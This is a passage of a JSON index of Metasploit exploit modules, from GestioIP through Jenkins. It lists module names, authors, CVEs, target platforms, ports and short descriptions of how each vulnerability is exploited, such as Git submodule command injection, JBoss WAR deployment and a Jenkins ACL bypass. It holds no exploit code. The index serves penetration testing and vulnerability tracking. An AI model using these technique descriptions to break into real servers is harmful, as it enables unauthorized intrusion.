],
"targets": [
"Automatic GestioIP 3.0"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/multi/http/gestioip_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/gestioip_exec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/git_client_command_exec": {
"name": "Malicious Git and Mercurial HTTP Server For CVE-2014-9390",
"full_name": "exploit/multi/http/git_client_command_exec",
"rank": 600,
"disclosure_date": "2014-12-18",
"type": "exploit",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module exploits CVE-2014-9390, which affects Git (versions less\n than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions\n less than 3.2.3) and describes three vulnerabilities.\n\n On operating systems which have case-insensitive file systems, like\n Windows and OS X, Git clients can be convinced to retrieve and\n overwrite sensitive configuration files in the .git\n directory which can allow arbitrary code execution if a vulnerable\n client can be convinced to perform certain actions (for example,\n a checkout) against a malicious Git repository.\n\n A second vulnerability with similar characteristics also exists in both\n Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where\n certain Unicode codepoints are ignorable.\n\n The third vulnerability with similar characteristics only affects\n Mercurial clients on Windows, where Windows \"short names\"\n (MS-DOS-compatible 8.3 format) are supported.\n\n Today this module only truly supports the first vulnerability (Git\n clients on case-insensitive file systems) but has the functionality to\n support the remaining two with a little work.",
"references": [
"CVE-2014-9390",
"URL-https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial",
"URL-http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html",
"URL-http://article.gmane.org/gmane.linux.kernel/1853266",
"URL-https://github.com/blog/1938-vulnerability-announced-update-your-git-clients",
"URL-https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/",
"URL-http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29",
"URL-http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e",
"URL-http://selenic.com/repo/hg-stable/rev/6dad422ecc5a"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows Powershell"
],
"mod_time": "2018-10-18 11:24:54 +0000",
"path": "/modules/exploits/multi/http/git_client_command_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/git_client_command_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/git_submodule_command_exec": {
"name": "Malicious Git HTTP Server For CVE-2017-1000117",
"full_name": "exploit/multi/http/git_submodule_command_exec",
"rank": 600,
"disclosure_date": "2017-08-10",
"type": "exploit",
"author": [
"timwr"
],
"description": "This module exploits CVE-2017-1000117, which affects Git\n version 2.7.5 and lower. A submodule of the form 'ssh://' can be passed\n parameters from the username incorrectly. This can be used to inject\n commands to the operating system when the submodule is cloned.\n\n This module creates a fake git repository which contains a submodule\n containing the vulnerability. The vulnerability is triggered when the\n submodules are initialised.",
"references": [
"CVE-2017-1000117",
"URL-https://seclists.org/oss-sec/2017/q3/280"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-03-29 10:44:58 +0000",
"path": "/modules/exploits/multi/http/git_submodule_command_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/git_submodule_command_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/git_submodule_url_exec": {
"name": "Malicious Git HTTP Server For CVE-2018-17456",
"full_name": "exploit/multi/http/git_submodule_url_exec",
"rank": 600,
"disclosure_date": "2018-10-05",
"type": "exploit",
"author": [
"timwr"
],
"description": "This module exploits CVE-2018-17456, which affects Git\n versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower.\n\n When a submodule url which starts with a dash e.g \"-u./payload\" is passed\n as an argument to git clone, the file \"payload\" inside the repository\n is executed.\n\n This module creates a fake git repository which contains a submodule\n containing the vulnerability. The vulnerability is triggered when the\n submodules are initialised (e.g git clone --recurse-submodules URL)",
"references": [
"CVE-2018-17456",
"URL-https://marc.info/?l=git&m=153875888916397&w=2",
"URL-https://gist.github.com/joernchen/38dd6400199a542bc9660ea563dcf2b6",
"URL-https://blog.github.com/2018-10-05-git-submodule-vulnerability"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-03-29 10:44:58 +0000",
"path": "/modules/exploits/multi/http/git_submodule_url_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/git_submodule_url_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/gitlab_shell_exec": {
"name": "Gitlab-shell Code Execution",
"full_name": "exploit/multi/http/gitlab_shell_exec",
"rank": 600,
"disclosure_date": "2013-11-04",
"type": "exploit",
"author": [
"Brandon Knight"
],
"description": "This module takes advantage of the addition of authorized\n ssh keys in the gitlab-shell functionality of Gitlab. Versions\n of gitlab-shell prior to 1.7.4 used the ssh key provided directly\n in a system call resulting in a command injection vulnerability. As\n this relies on adding an ssh key to an account, valid credentials\n are required to exploit this vulnerability.",
"references": [
"URL-https://about.gitlab.com/2013/11/04/gitlab-ce-6-2-and-5-4-security-release/",
"CVE-2013-4490"
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux",
"Linux (x64)",
"Unix (CMD)",
"Python"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/gitlab_shell_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/gitlab_shell_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/gitlist_arg_injection": {
"name": "GitList v0.6.0 Argument Injection Vulnerability",
"full_name": "exploit/multi/http/gitlist_arg_injection",
"rank": 600,
"disclosure_date": "2018-04-26",
"type": "exploit",
"author": [
"Kacper Szurek",
"Shelby Pace"
],
"description": "This module exploits an argument injection vulnerability in GitList v0.6.0.\n The vulnerability arises from GitList improperly validating input using the php function\n 'escapeshellarg'.",
"references": [
"CVE-2018-1000533",
"EDB-44548",
"URL-https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"GitList v0.6.0"
],
"mod_time": "2018-07-12 19:03:52 +0000",
"path": "/modules/exploits/multi/http/gitlist_arg_injection.rb",
"is_install_path": true,
"ref_name": "multi/http/gitlist_arg_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/gitorious_graph": {
"name": "Gitorious Arbitrary Command Execution",
"full_name": "exploit/multi/http/gitorious_graph",
"rank": 600,
"disclosure_date": "2012-01-19",
"type": "exploit",
"author": [
"joernchen <joernchen@phenoelit.de>"
],
"description": "This module exploits an arbitrary command execution vulnerability\n in gitorious. Unvalidated input is passed to the shell allowing\n command execution.",
"references": [
"OSVDB-78480",
"URL-http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/gitorious_graph.rb",
"is_install_path": true,
"ref_name": "multi/http/gitorious_graph",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/glassfish_deployer": {
"name": "Sun/Oracle GlassFish Server Authenticated Code Execution",
"full_name": "exploit/multi/http/glassfish_deployer",
"rank": 600,
"disclosure_date": "2011-08-04",
"type": "exploit",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>",
"Joshua Abraham <jabra@rapid7.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module logs in to a GlassFish Server (Open Source or Commercial) using various\n methods (such as authentication bypass, default credentials, or user-supplied login),\n and deploys a malicious war file in order to get remote code execution. It has been\n tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer\n GlassFish versions do not allow remote access (Secure Admin) by default, but is required\n for exploitation.",
"references": [
"CVE-2011-0807",
"OSVDB-71948"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 4848,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Java Universal",
"Windows Universal",
"Linux Universal"
],
"mod_time": "2018-08-07 16:42:00 +0000",
"path": "/modules/exploits/multi/http/glassfish_deployer.rb",
"is_install_path": true,
"ref_name": "multi/http/glassfish_deployer",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/glossword_upload_exec": {
"name": "Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/glossword_upload_exec",
"rank": 600,
"disclosure_date": "2013-02-05",
"type": "exploit",
"author": [
"AkaStep",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in Glossword\n versions 1.8.8 to 1.8.12 when run as a standalone application.\n This application has an upload feature that allows an authenticated user\n with administrator roles to upload arbitrary files to the 'gw_temp/a/'\n directory.",
"references": [
"EDB-24456",
"OSVDB-89960"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/glossword_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/glossword_upload_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/glpi_install_rce": {
"name": "GLPI install.php Remote Command Execution",
"full_name": "exploit/multi/http/glpi_install_rce",
"rank": 0,
"disclosure_date": "2013-09-12",
"type": "exploit",
"author": [
"Tristan Leiter < research@navixia.com >"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n GLPI 'install.php' script. This module is set to ManualRanking due to this\n module overwriting the target database configuration, which may introduce target\n instability.",
"references": [
"CVE-2013-5696",
"URL-https://www.navixia.com/blog/entry/navixia-finds-critical-vulnerabilities-in-glpi-cve-2013-5696.html",
"URL-http://www.glpi-project.org/forum/viewtopic.php?id=33762"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"GLPI 0.84 or older"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/glpi_install_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/glpi_install_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/horde_form_file_upload": {
"name": "Horde Form File Upload Vulnerability",
"full_name": "exploit/multi/http/horde_form_file_upload",
"rank": 600,
"disclosure_date": "2019-03-24",
"type": "exploit",
"author": [
"Ratiosec"
],
"description": "Horde Groupware Webmail contains a flaw that allows an authenticated remote\n attacker to execute arbitrary PHP code. The exploitation requires the Turba\n subcomponent to be installed.\n\n This module was tested on Horde versions 5.2.22 and 5.2.17 running Horde Form subcomponent < 2.0.19.",
"references": [
"CVE-2019-9858",
"URL-https://www.ratiosec.com/2019/horde-groupware-webmail-authenticated-arbitrary-file-injection-to-rce/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2019-04-09 13:43:54 +0000",
"path": "/modules/exploits/multi/http/horde_form_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/horde_form_file_upload",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/horde_href_backdoor": {
"name": "Horde 3.3.12 Backdoor Arbitrary PHP Code Execution",
"full_name": "exploit/multi/http/horde_href_backdoor",
"rank": 600,
"disclosure_date": "2012-02-13",
"type": "exploit",
"author": [
"Eric Romang",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits an arbitrary PHP code execution vulnerability introduced\n as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10.",
"references": [
"CVE-2012-0209",
"OSVDB-79246",
"EDB-18492",
"URL-http://dev.horde.org/h/jonah/stories/view.php?channel_id=1&id=155",
"URL-http://eromang.zataz.com/2012/02/15/cve-2012-0209-horde-backdoor-analysis/"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/horde_href_backdoor.rb",
"is_install_path": true,
"ref_name": "multi/http/horde_href_backdoor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/hp_sitescope_issuesiebelcmd": {
"name": "HP SiteScope issueSiebelCmd Remote Code Execution",
"full_name": "exploit/multi/http/hp_sitescope_issuesiebelcmd",
"rank": 500,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in HP SiteScope. The vulnerability exists in the\n APISiteScopeImpl web service, specifically in the issueSiebelCmd method, which allows the\n user to execute arbitrary commands without authentication. This module has been tested\n successfully on HP SiteScope 11.20 over Windows 2003 SP2, Windows 2008 and CentOS 6.5.",
"references": [
"CVE-2013-4835",
"OSVDB-99230",
"BID-63478",
"ZDI-13-263"
],
"platform": "Unix,Windows",
"arch": "x86, cmd",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP SiteScope 11.20 / Windows",
"HP SiteScope 11.20 / Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb",
"is_install_path": true,
"ref_name": "multi/http/hp_sitescope_issuesiebelcmd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/hp_sitescope_uploadfileshandler": {
"name": "HP SiteScope Remote Code Execution",
"full_name": "exploit/multi/http/hp_sitescope_uploadfileshandler",
"rank": 400,
"disclosure_date": "2012-08-29",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in HP SiteScope. It exploits two\n vulnerabilities in order to get its objective. An authentication bypass in the\n create operation, available through the APIPreferenceImpl AXIS service, to create\n a new account with empty credentials and, subsequently, uses the new account to\n abuse the UploadManagerServlet and upload an arbitrary payload embedded in a JSP.\n The module has been tested successfully on HP SiteScope 11.20 over Windows 2003 SP2\n and Linux CentOS 6.3.",
"references": [
"CVE-2012-3260",
"CVE-2012-3261",
"OSVDB-85121",
"OSVDB-85151",
"BID-55269",
"BID-55273",
"ZDI-12-174",
"ZDI-12-175"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP SiteScope 11.20 / Windows 2003 SP2",
"HP SiteScope 11.20 / Linux CentOS 6.3"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb",
"is_install_path": true,
"ref_name": "multi/http/hp_sitescope_uploadfileshandler",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/hp_sys_mgmt_exec": {
"name": "HP System Management Homepage JustGetSNMPQueue Command Injection",
"full_name": "exploit/multi/http/hp_sys_mgmt_exec",
"rank": 600,
"disclosure_date": "2013-06-11",
"type": "exploit",
"author": [
"Markus Wulftange",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in HP System Management Homepage. By\n supplying a specially crafted HTTP request, it is possible to control the\n 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),\n which will be used in a exec() function.",
"references": [
"CVE-2013-3576",
"OSVDB-94191",
"US-CERT-VU-735364"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 2381,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Linux",
"Linux (x64)",
"Windows",
"Windows (x64)"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/multi/http/hp_sys_mgmt_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/hp_sys_mgmt_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/hyperic_hq_script_console": {
"name": "VMware Hyperic HQ Groovy Script-Console Java Execution",
"full_name": "exploit/multi/http/hyperic_hq_script_console",
"rank": 600,
"disclosure_date": "2013-10-10",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module uses the VMware Hyperic HQ Groovy script console to execute\n OS commands using Java. Valid credentials for an application administrator\n user account are required. This module has been tested successfully with\n Hyperic HQ 4.6.6 on Windows 2003 SP2 and Ubuntu 10.04 systems.",
"references": [
"URL-https://pubs.vmware.com/vfabric5/topic/com.vmware.vfabric.hyperic.4.6/ui-Groovy.html"
],
"platform": "Linux,Unix,Windows",
"arch": "",
"rport": 7443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows",
"Linux",
"Unix CMD"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/hyperic_hq_script_console.rb",
"is_install_path": true,
"ref_name": "multi/http/hyperic_hq_script_console",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/ibm_openadmin_tool_soap_welcomeserver_exec": {
"name": "IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution",
"full_name": "exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec",
"rank": 600,
"disclosure_date": "2017-05-30",
"type": "exploit",
"author": [
"SecuriTeam",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an unauthenticated remote PHP code execution\n vulnerability in IBM OpenAdmin Tool included with IBM Informix\n versions 11.5, 11.7, and 12.1.\n\n The 'welcomeServer' SOAP service does not properly validate user input\n in the 'new_home_page' parameter of the 'saveHomePage' method allowing\n arbitrary PHP code to be written to the config.php file. The config.php\n file is executed in most pages within the application, and accessible\n directly via the web root, resulting in code execution.\n\n This module has been tested successfully on IBM OpenAdmin Tool 3.14\n on Informix 12.10 Developer Edition (SUSE Linux 11) virtual appliance.",
"references": [
"CVE-2017-1092",
"EDB-42091",
"URL-https://www-01.ibm.com/support/docview.wss?uid=swg22002897",
"URL-https://blogs.securiteam.com/index.php/archives/3210",
"URL-https://seclists.org/fulldisclosure/2017/May/105"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/ibm_openadmin_tool_soap_welcomeserver_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/ispconfig_php_exec": {
"name": "ISPConfig Authenticated Arbitrary PHP Code Execution",
"full_name": "exploit/multi/http/ispconfig_php_exec",
"rank": 600,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "ISPConfig allows an authenticated administrator to export language settings into a PHP script\n which is intended to be reuploaded later to restore language settings. This feature\n can be abused to run aribitrary PHP code remotely on the ISPConfig server.\n\n This module was tested against version 3.0.5.2.",
"references": [
"CVE-2013-3629",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/ispconfig_php_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/ispconfig_php_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/jboss_bshdeployer": {
"name": "JBoss JMX Console Beanshell Deployer WAR Upload and Deployment",
"full_name": "exploit/multi/http/jboss_bshdeployer",
"rank": 600,
"disclosure_date": "2010-04-26",
"type": "exploit",
"author": [
"Patrick Hof",
"jduck <jduck@metasploit.com>",
"Konrads Smelkovs",
"h0ng10"
],
"description": "This module can be used to install a WAR file payload on JBoss servers that have\n an exposed \"jmx-console\" application. The payload is put on the server by\n using the jboss.system:BSHDeployer\\'s createScriptDeployment() method.",
"references": [
"CVE-2010-0738",
"OSVDB-64171",
"URL-http://www.redteam-pentesting.de/publications/jboss",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic (Java based)",
"Windows Universal",
"Linux Universal",
"Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/jboss_bshdeployer.rb",
"is_install_path": true,
"ref_name": "multi/http/jboss_bshdeployer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/jboss_deploymentfilerepository": {
"name": "JBoss Java Class DeploymentFileRepository WAR Deployment",
"full_name": "exploit/multi/http/jboss_deploymentfilerepository",
"rank": 600,
"disclosure_date": "2010-04-26",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Jacob Giannantonio",
"Patrick Hof",
"h0ng10"
],
"description": "This module uses the DeploymentFileRepository class in\n JBoss Application Server (jbossas) to deploy a JSP file\n which then deploys the WAR file.",
"references": [
"CVE-2010-0738",
"OSVDB-64171",
"URL-http://www.redteam-pentesting.de/publications/jboss",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic (Java based)",
"Windows Universal",
"Linux Universal",
"Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/jboss_deploymentfilerepository.rb",
"is_install_path": true,
"ref_name": "multi/http/jboss_deploymentfilerepository",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/jboss_invoke_deploy": {
"name": "JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)",
"full_name": "exploit/multi/http/jboss_invoke_deploy",
"rank": 600,
"disclosure_date": "2007-02-20",
"type": "exploit",
"author": [
"Patrick Hof",
"Jens Liebchen",
"h0ng10"
],
"description": "This module can be used to execute a payload on JBoss servers that have an\n exposed HTTPAdaptor's JMX Invoker exposed on the \"JMXInvokerServlet\". By invoking\n the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed\n to finally upload the selected payload to the target. The DeploymentFileRepository\n methods are only available on Jboss 4.x and 5.x.",
"references": [
"CVE-2007-1036",
"OSVDB-33744",
"URL-http://www.redteam-pentesting.de/publications/jboss"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Java Universal",
"Windows Universal",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/jboss_invoke_deploy.rb",
"is_install_path": true,
"ref_name": "multi/http/jboss_invoke_deploy",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/jboss_maindeployer": {
"name": "JBoss JMX Console Deployer Upload and Execute",
"full_name": "exploit/multi/http/jboss_maindeployer",
"rank": 600,
"disclosure_date": "2007-02-20",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>",
"Patrick Hof",
"h0ng10"
],
"description": "This module can be used to execute a payload on JBoss servers that have\n an exposed \"jmx-console\" application. The payload is put on the server by\n using the jboss.system:MainDeployer functionality. To accomplish this, a\n temporary HTTP server is created to serve a WAR archive containing our\n payload. This method will only work if the target server allows outbound\n connections to us.",
"references": [
"CVE-2007-1036",
"CVE-2010-0738",
"OSVDB-33744",
"URL-http://www.redteam-pentesting.de/publications/jboss",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic (Java based)",
"Windows Universal",
"Linux Universal",
"Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/jboss_maindeployer.rb",
"is_install_path": true,
"ref_name": "multi/http/jboss_maindeployer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/jboss_seam_upload_exec": {
"name": "JBoss Seam 2 File Upload and Execute",
"full_name": "exploit/multi/http/jboss_seam_upload_exec",
"rank": 300,
"disclosure_date": "2010-08-05",
"type": "exploit",
"author": [
"vulp1n3 <vulp1n3@gmail.com>"
],
"description": "Versions of the JBoss Seam 2 framework < 2.2.1CR2 fails to properly\n sanitize inputs to some JBoss Expression Language expressions. As a\n result, attackers can gain remote code execution through the\n application server. This module leverages RCE to upload and execute\n a given payload.\n\n Versions of the JBoss application server (AS) admin-console are\n known to be vulnerable to this exploit, without requiring authentication.\n Tested against JBoss AS 5 and 6, running on Linux with JDKs 6 and 7.\n\n This module provides a more efficient method of exploitation - it\n does not loop to find desired Java classes and methods.",
"references": [
"CVE-2010-1871",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=615956",
"URL-http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html",
"URL-http://archives.neohapsis.com/archives/bugtraq/2013-05/0117.html"
],
"platform": "Java",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/jboss_seam_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/jboss_seam_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/jenkins_metaprogramming": {
"name": "Jenkins ACL Bypass and Metaprogramming RCE",
"full_name": "exploit/multi/http/jenkins_metaprogramming",
"rank": 600,
"disclosure_date": "2019-01-08",
"type": "exploit",
"author": [
"Orange Tsai",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a vulnerability in Jenkins dynamic routing to\n bypass the Overall/Read ACL and leverage Groovy metaprogramming to\n download and execute a malicious JAR file.\n\n The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work\n on later versions of Jenkins.\n\n Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.",
"references": [
"CVE-2019-1003000",
"CVE-2019-1003001",
"CVE-2019-1003002",
"EDB-46427",
"URL-https://jenkins.io/security/advisory/2019-01-08/",
"URL-https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html",
"URL-https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html",
"URL-https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc"
],
"platform": "Java",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)"
],
"mod_time": "2019-03-21 11:20:21 +0000",
"path": "/modules/exploits/multi/http/jenkins_metaprogramming.rb",
"is_install_path": true,
"ref_name": "multi/http/jenkins_metaprogramming",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_multi/http/jenkins_script_console": {
"name": "Jenkins-CI Script-Console Java Execution",
"full_name": "exploit/multi/http/jenkins_script_console",
